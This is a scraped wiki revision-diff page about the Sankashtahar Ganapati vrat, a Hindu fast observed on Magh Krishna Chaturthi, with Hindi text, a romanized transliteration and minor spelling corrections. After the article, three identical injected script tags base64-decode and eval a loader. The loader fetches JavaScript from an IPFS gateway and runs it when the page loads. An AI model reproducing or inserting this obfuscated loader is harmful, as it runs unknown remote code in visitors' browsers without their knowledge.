Difference between revisions of "संकष्टहरगणपति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[माघ]] [[कृष्ण पक्ष]] की [[चतुर्थी]] पर संकष्टहर गणपतिव्रत किया जाता है।
 
*[[माघ]] [[कृष्ण पक्ष]] की [[चतुर्थी]] पर संकष्टहर गणपतिव्रत किया जाता है।
 
*संकष्टहर गणपतिव्रत तिथिव्रत; [[चन्द्रोदय]] पर; [[देवता]] [[गणेश]] की पूजा की जाती है।
 
*संकष्टहर गणपतिव्रत तिथिव्रत; [[चन्द्रोदय]] पर; [[देवता]] [[गणेश]] की पूजा की जाती है।
*व्रतरत्नाकर<ref>(व्रतरत्नाकर 176-188)</ref> ने विस्तृत उल्लेख किया है, जिसमें ­[[ऋगवेद]]<ref>(ऋगवेद 10|63|3, 4|50|6)</ref>, पुरुषसूक्त<ref>(पुरुषसूक्त ऋगवेद 10|90)</ref> के मंत्र तथा [[नारद पुराण]] के एवं अन्य [[पुराण|पौराणिक]] मंत्र दिये गये हैं।
+
*व्रतरत्नाकर<ref>व्रतरत्नाकर 176-188</ref> ने विस्तृत उल्लेख किया है, जिसमें ­[[ऋग्वेद]]<ref>ऋग्वेद 10|63|3, 4|50|6</ref>, पुरुषसूक्त<ref>पुरुषसूक्त ऋगवेद 10|90</ref> के मंत्र तथा [[नारद पुराण]] के एवं अन्य [[पुराण|पौराणिक]] मंत्र दिये गये हैं।
 
*संकष्टहर गणपतिव्रत 16 उपचार हैं।
 
*संकष्टहर गणपतिव्रत 16 उपचार हैं।
 
*संकष्टहर गणपतिव्रत 21 नामों के साथ [[गणेश]] की पूजा करनी चाहिए।
 
*संकष्टहर गणपतिव्रत 21 नामों के साथ [[गणेश]] की पूजा करनी चाहिए।
 
*उतनी ही संख्या में [[दूर्वा]] की शाखाएँ होनी चाहिए।
 
*उतनी ही संख्या में [[दूर्वा]] की शाखाएँ होनी चाहिए।
*उतनी ही संख्या में [[भ्रंगराज]], बिल्व, बदरी, धत्तूर, शमी की पत्तियाँ एवं लाल फूल होने चाहिए।
+
*उतनी ही संख्या में [[भृंगराज]], बिल्व, बदरी, धत्तूर, शमी की पत्तियाँ एवं लाल फूल होने चाहिए।
 
*[[गणपति]] की 108 नामों से पूजा की जानी चाहिए।  
 
*[[गणपति]] की 108 नामों से पूजा की जानी चाहिए।  
 
*अन्त में पूजक को 5 मोदक एवं दक्षिणा देनी चाहिए।
 
*अन्त में पूजक को 5 मोदक एवं दक्षिणा देनी चाहिए।
 
*ऐसा आया है कि [[व्यास]] ने यह व्रत [[युधिष्ठर]] को बताया था।
 
*ऐसा आया है कि [[व्यास]] ने यह व्रत [[युधिष्ठर]] को बताया था।
 
*संकष्ट का अर्थ है 'कष्ट या विपत्ति', 'कष्ट' का अर्थ है 'क्लेश', सम् उसके आधिक्य का द्योतक है।  
 
*संकष्ट का अर्थ है 'कष्ट या विपत्ति', 'कष्ट' का अर्थ है 'क्लेश', सम् उसके आधिक्य का द्योतक है।  
 +
{{प्रचार}}
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:47, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • magh krishna paksh ki chaturthi par sankashtahar ganapativrat kiya jata hai.
  • sankashtahar ganapativrat tithivrat; chandroday par; devata ganesh ki pooja ki jati hai.
  • vrataratnakar[1] ne vistrit ullekh kiya hai, jisamean ­rrigved[2], purushasookt[3] ke mantr tatha narad puran ke evan any pauranik mantr diye gaye haian.
  • sankashtahar ganapativrat 16 upachar haian.
  • sankashtahar ganapativrat 21 namoan ke sath ganesh ki pooja karani chahie.
  • utani hi sankhya mean doorva ki shakhaean honi chahie.
  • utani hi sankhya mean bhriangaraj, bilv, badari, dhattoor, shami ki pattiyaan evan lal phool hone chahie.
  • ganapati ki 108 namoan se pooja ki jani chahie.
  • ant mean poojak ko 5 modak evan dakshina deni chahie.
  • aisa aya hai ki vyas ne yah vrat yudhishthar ko bataya tha.
  • sankasht ka arth hai 'kasht ya vipatti', 'kasht' ka arth hai 'klesh', samh usake adhiky ka dyotak hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. vrataratnakar 176-188
  2. rrigved 10|63|3, 4|50|6
  3. purushasookt rrigaved 10|90

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>